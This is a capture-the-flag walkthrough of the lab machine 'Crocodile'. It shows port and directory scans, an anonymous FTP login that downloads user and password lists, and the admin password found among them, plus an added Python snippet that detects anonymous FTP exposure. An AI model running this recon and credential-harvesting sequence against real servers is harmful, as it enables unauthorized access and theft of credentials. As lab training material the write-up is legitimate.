Crocodile
Port reconnaissance with nmap,
or you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon crocodile.htb
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Hey I was thinking about this part of the code...oh wait, pull request is already done RiJaba1
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 12:59 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:59
Completed NSE at 12:59, 0.00s elapsed
Initiating Ping Scan at 12:59
Scanning crocodile.htb (10.129.130.26) [4 ports]
Completed Ping Scan at 12:59, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:59
Scanning crocodile.htb (10.129.130.26) [65535 ports]
Discovered open port 80/tcp on 10.129.130.26
Discovered open port 21/tcp on 10.129.130.26
Completed SYN Stealth Scan at 13:00, 14.30s elapsed (65535 total ports)
NSE: Script scanning 10.129.130.26.
Initiating NSE at 13:00
Completed NSE at 13:00, 0.40s elapsed
Nmap scan report for crocodile.htb (10.129.130.26)
Host is up (0.063s latency).
Not shown: 64919 closed tcp ports (reset), 614 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
80/tcp open http
NSE: Script Post-scanning.
Initiating NSE at 13:00
Completed NSE at 13:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.93 seconds
Raw packets sent: 70979 (3.123MB) | Rcvd: 66418 (2.657MB)
┌─[+] [ftp]
└─(Credentials for ftp crocodile.htb:21)
[user:ftp][password:]
[user:anonymous][password:]
[+] [fuzzin server]
http://crocodile.htb [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[hello@ayroui.com,support@uideck.com], Frame, HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.130.26], JQuery[1.12.4], Modernizr[3.7.1.min], Script, Title[Smash - Bootstrap Business Template]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jul 21 13:00:13 2022
URL_BASE: http://crocodile.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://crocodile.htb:80/ ----
==> DIRECTORY: http://crocodile.htb:80/assets/
==> DIRECTORY: http://crocodile.htb:80/css/
==> DIRECTORY: http://crocodile.htb:80/dashboard/
==> DIRECTORY: http://crocodile.htb:80/fonts/
+ http://crocodile.htb:80/index.html (CODE:200|SIZE:58565)
==> DIRECTORY: http://crocodile.htb:80/js/
+ http://crocodile.htb:80/server-status (CODE:403|SIZE:278)
-----------------
END_TIME: Thu Jul 21 13:05:28 2022
DOWNLOADED: 4612 - FOUND: 2
The recon tool reports two open TCP ports: 21 for FTP and 80 for the web service. It also shows that we can log in to the FTP service as user ftp or anonymous with a blank password.
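From the defender's side, the same ftp-anon result can be picked out of saved scan output automatically. The following is an added example, not part of the original write-up: the function name `audit` and the `SENSITIVE` filename heuristic are assumptions, and the sample input is constructed from the scan lines shown above.

```python
import re

# Constructed sample: the relevant lines of nmap "normal" output from the scan above.
SAMPLE = """\
Nmap scan report for crocodile.htb (10.129.130.26)
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
80/tcp open http
"""

# Hypothetical heuristic: filename fragments that suggest credential material.
SENSITIVE = re.compile(r"(passw|userlist|shadow|cred|secret|id_rsa|\.key$)", re.I)
HOST = re.compile(r"^Nmap scan report for (\S+)")
PORT = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
# An ls-style line inside the NSE script block: "| -rw-r--r-- ... name"
LISTING = re.compile(r"^\|[_ ]?\s*[-dl][rwxsStT-]{9}\s+.*\s(\S+)$")

def audit(nmap_text):
    """Return one finding per open port where ftp-anon reported anonymous login."""
    findings, host, port, current = [], None, None, None
    for line in nmap_text.splitlines():
        if m := HOST.match(line):
            host, port, current = m.group(1), None, None
        elif m := PORT.match(line):
            port, current = int(m.group(1)), None
        elif "ftp-anon:" in line and "Anonymous FTP login allowed" in line:
            current = {"host": host, "port": port, "files": [], "sensitive": []}
            findings.append(current)
        elif current is not None and (m := LISTING.match(line)):
            name = m.group(1)
            current["files"].append(name)
            if SENSITIVE.search(name):
                current["sensitive"].append(name)
        elif not line.startswith("|"):
            current = None  # left the script output block
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f['host']}:{f['port']} anonymous FTP, "
              f"{len(f['files'])} files listed, review: {f['sensitive']}")
```

On vsftpd, the server identified in the FTP banner below, anonymous login is controlled by `anonymous_enable` in `vsftpd.conf`; setting it to `NO` closes this exposure.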
┌──(root@ghost)-[/home/ghost]
└─# ftp crocodile.htb
Connected to crocodile.htb.
220 (vsFTPd 3.0.3)
Name (crocodile.htb:ghost): ftp
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||43988|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
226 Directory send OK.
ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||48777|)
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |******************************************************************************************************************************************************| 33 9.92 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.50 KiB/s)
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||48372|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |******************************************************************************************************************************************************| 62 33.90 KiB/s 00:00 ETA
226 Transfer complete.
62 bytes received in 00:00 (0.94 KiB/s)
ftp> exit
221 Goodbye.
┌──(root@ghost)-[/home/ghost]
└─# cat allowed.userlist
aron
pwnmeow
egotisticalsw
admin
┌──(root@ghost)-[/home/ghost]
└─# cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd
We obtained lists of users and passwords. After checking the combinations, we can log in as admin with the password rKXM59ESxesUFHAd.
